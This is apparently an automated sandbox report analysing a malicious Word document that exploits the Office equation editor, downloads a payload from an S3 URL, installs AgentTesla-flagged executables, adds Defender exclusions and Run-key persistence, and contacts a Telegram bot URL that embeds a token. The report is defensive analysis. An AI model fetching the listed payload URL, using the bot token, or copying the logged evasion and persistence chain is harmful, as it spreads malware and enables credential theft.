Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTeslaShow sources
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505

Remote Access Functionality:

barindex
Yara detected AgentTeslaShow sources
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Startup Items1Startup Items1Masquerading221OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder221Access Token Manipulation1Disable or Modify Tools11LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Process Injection111Virtualization/Sandbox Evasion121Security Account ManagerVirtualization/Sandbox Evasion121SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder221Access Token Manipulation1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection111LSA SecretsFile and Directory Discovery12SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404236 Sample: Allignright_companyprofile.doc Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 57 api.telegram.org 2->57 67 Multi AV Scanner detection for dropped file 2->67 69 Sigma detected: Powershell adding suspicious path to exclusion list 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 14 other signatures 2->73 9 EQNEDT32.EXE 11 2->9         started        14 svchost.exe 2->14         started        16 Bw6d8Paf6bOV36xS4N6.exe 2->16         started        18 WINWORD.EXE 290 26 2->18         started        signatures3 process4 dnsIp5 59 s3-us-west-2-r-w.amazonaws.com 52.218.240.113, 49167, 80 AMAZON-02US United States 9->59 61 miolouno.s3-us-west-2.amazonaws.com 9->61 53 C:\Users\user\AppData\...\CTF loader_es.exe, PE32 9->53 dropped 55 C:\Users\user\AppData\Local\...\mad[1].exe, PE32 9->55 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->79 20 CTF loader_es.exe 5 4 9->20         started        81 Multi AV Scanner detection for dropped file 14->81 83 Machine Learning detection for dropped file 14->83 85 Adds a directory exclusion to Windows Defender 16->85 24 powershell.exe 16->24         started        26 powershell.exe 16->26         started        28 powershell.exe 16->28         started        30 powershell.exe 16->30         started        file6 signatures7 process8 file9 49 C:\Windows\Resources\Themes\...\svchost.exe, PE32 20->49 dropped 51 C:\Users\user\...\Bw6d8Paf6bOV36xS4N6.exe, PE32 20->51 dropped 75 Creates an autostart registry key pointing to binary in C:\Windows 20->75 77 Adds a directory exclusion to Windows Defender 20->77 32 Bw6d8Paf6bOV36xS4N6.exe 1 20->32         started        35 powershell.exe 7 20->35         started        37 powershell.exe 7 20->37         started        39 7 other processes 20->39 signatures10 process11 signatures12 63 Adds a directory exclusion to Windows Defender 32->63 65 Injects a PE file into a foreign processes 32->65 41 powershell.exe 32->41         started        43 powershell.exe 32->43         started        45 powershell.exe 32->45         started        47 powershell.exe 32->47         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Allignright_companyprofile.doc15%ReversingLabsDocument-RTF.Exploit.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\CTF loader_es.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe100%Joe Sandbox ML
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe41%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe19%MetadefenderBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\CTF loader_es.exe41%VirustotalBrowse
C:\Users\user\AppData\Roaming\CTF loader_es.exe19%MetadefenderBrowse
C:\Users\user\AppData\Roaming\CTF loader_es.exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe41%VirustotalBrowse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe19%MetadefenderBrowse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe19%MetadefenderBrowse
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe45%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s3-us-west-2-r-w.amazonaws.com
52.218.240.113
truefalse
    		high
    api.telegram.org
    		149.154.167.220
    		truefalse
      		high
      miolouno.s3-us-west-2.amazonaws.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://miolouno.s3-us-west-2.amazonaws.com/mad.exefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckCTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpfalse
            		high
            http://www.windows.com/pctv.powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
              		high
              http://investor.msn.comCTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                		high
                http://www.msnbc.com/news/ticker.txtCTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                  		high
                  http://www.icra.org/vocabulary/.CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpfalse
                    		high
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpfalse
                      		high
                      http://investor.msn.com/CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                        		high
                        http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpfalse
                          		high
                          https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpfalse
                            		high
                            http://www.%s.comPACTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		low
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueCTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.hotmail.com/oeCTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCTF loader_es.exe, 00000004.00000003.2124857296.0000000002B2B000.00000004.00000001.sdmpfalse
                                		high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipCTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                52.218.240.113
                                		s3-us-west-2-r-w.amazonaws.comUnited States
                                		16509AMAZON-02USfalse

                                General Information

                                Joe Sandbox Version:32.0.0 Black Diamond
                                Analysis ID:404236
                                Start date:04.05.2021
                                Start time:20:30:17
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 15m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Allignright_companyprofile.doc
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:40
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 909
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .doc
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Found warning dialog
                                • Click Ok
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                20:30:38API Interceptor152x Sleep call for process: EQNEDT32.EXE modified
                                20:30:43API Interceptor219x Sleep call for process: CTF loader_es.exe modified
                                20:30:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                20:30:52API Interceptor243x Sleep call for process: powershell.exe modified
                                20:30:57API Interceptor178x Sleep call for process: Bw6d8Paf6bOV36xS4N6.exe modified
                                20:31:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                20:31:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                20:31:15API Interceptor8x Sleep call for process: svchost.exe modified
                                20:31:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
                                20:31:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                s3-us-west-2-r-w.amazonaws.comPO5421-allignright.docGet hashmaliciousBrowse
                                • 52.218.170.106
                                04052021paymentscancopy.docGet hashmaliciousBrowse
                                • 52.218.224.193
                                d2c23008_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                • 52.218.180.209
                                xSfGet hashmaliciousBrowse
                                • 52.218.240.169
                                https://cornpany.s3-us-west-2.amazonaws.com/kzrtl.htmlGet hashmaliciousBrowse
                                • 52.218.252.49
                                https://share-my-resume.s3-us-west-2.amazonaws.com/2020/Emir-Markham-Resume-2020-11-16.docGet hashmaliciousBrowse
                                • 52.218.152.113
                                http://bcx-production-attachments-us-west-2.s3-us-west-2.amazonaws.comGet hashmaliciousBrowse
                                • 52.218.233.113
                                https://docs.google.com/document/d/e/2PACX-1vQxWTOwb4Q2IRxBsWs4I-tazKn6L7Tlb_umbjgm-Hc4VjUaQL96-AhMAkd3g6-XzhGxdl8RYebE29rp/pubGet hashmaliciousBrowse
                                • 52.218.237.153
                                https://docs.google.com/document/d/e/2PACX-1vS6NK2IbibcQuT3uZBBdNEmndunv9Oiw0jTUmBO6uKBjix7DH6ZwB0EWgfTu2CvIIHlPw9P7lmFSzeT/pubGet hashmaliciousBrowse
                                • 52.218.205.17
                                5476gsmtf9b8f15e4201.exeGet hashmaliciousBrowse
                                • 52.218.244.145
                                https://carletoalawyer.com/jss/Get hashmaliciousBrowse
                                • 52.218.234.105
                                http://coreit.in/?a&login=fakeuser@devnull.comGet hashmaliciousBrowse
                                • 52.218.128.29
                                PaymentPlan.docxGet hashmaliciousBrowse
                                • 52.218.249.65
                                api.telegram.orgPO5421-allignright.docGet hashmaliciousBrowse
                                • 149.154.167.220
                                Pending DHL Shipment Notification REF 04521.xlsxGet hashmaliciousBrowse
                                • 149.154.167.220
                                04052021paymentscancopy.docGet hashmaliciousBrowse
                                • 149.154.167.220
                                85a3f6aa_by_Libranalysis.rtfGet hashmaliciousBrowse
                                • 149.154.167.220
                                BID6200306761.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                OverdueInvoice-PDF.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                SLIP.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                NeworderMay20212021-pdf.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                1hbYGZf6BQ.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                from-iso_RFQ___PU.EXE1__.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                Xerox Scan_07122020181109.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                menXxRXr64.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                pN0fSLX8vx.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                Order Of Items Listed.xlsxGet hashmaliciousBrowse
                                • 149.154.167.220
                                l6qQa2fQ97.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                PO 300174.xlsxGet hashmaliciousBrowse
                                • 149.154.167.220
                                Quotation.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                WdWqhSMRsdKJxkl.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                Quotation 90809.exeGet hashmaliciousBrowse
                                • 149.154.167.220
                                nrEs3n7XCQ.exeGet hashmaliciousBrowse
                                • 149.154.167.220

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AMAZON-02USPO5421-allignright.docGet hashmaliciousBrowse
                                • 52.218.170.106
                                pasteBorder.dllGet hashmaliciousBrowse
                                • 13.224.187.73
                                04052021paymentscancopy.docGet hashmaliciousBrowse
                                • 52.218.224.193
                                Indeed_Update_File.htmlGet hashmaliciousBrowse
                                • 143.204.98.87
                                presentation.jarGet hashmaliciousBrowse
                                • 15.237.76.117
                                presentation.jarGet hashmaliciousBrowse
                                • 143.204.98.25
                                Tmw6ajHw6W.exeGet hashmaliciousBrowse
                                • 3.14.182.203
                                New Financial Reports & Statements.htmlGet hashmaliciousBrowse
                                • 52.218.137.48
                                609110f2d14a6.dllGet hashmaliciousBrowse
                                • 54.154.149.76
                                945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exeGet hashmaliciousBrowse
                                • 3.14.18.91
                                SWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                • 3.34.109.201
                                jH70i5mxJO.exeGet hashmaliciousBrowse
                                • 54.188.107.146
                                3ZtdRsbjxo.exeGet hashmaliciousBrowse
                                • 104.192.141.1
                                Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                • 18.222.240.99
                                4GGwmv0AJm.exeGet hashmaliciousBrowse
                                • 52.32.122.68
                                c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                • 54.72.3.133
                                #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                • 143.204.98.42
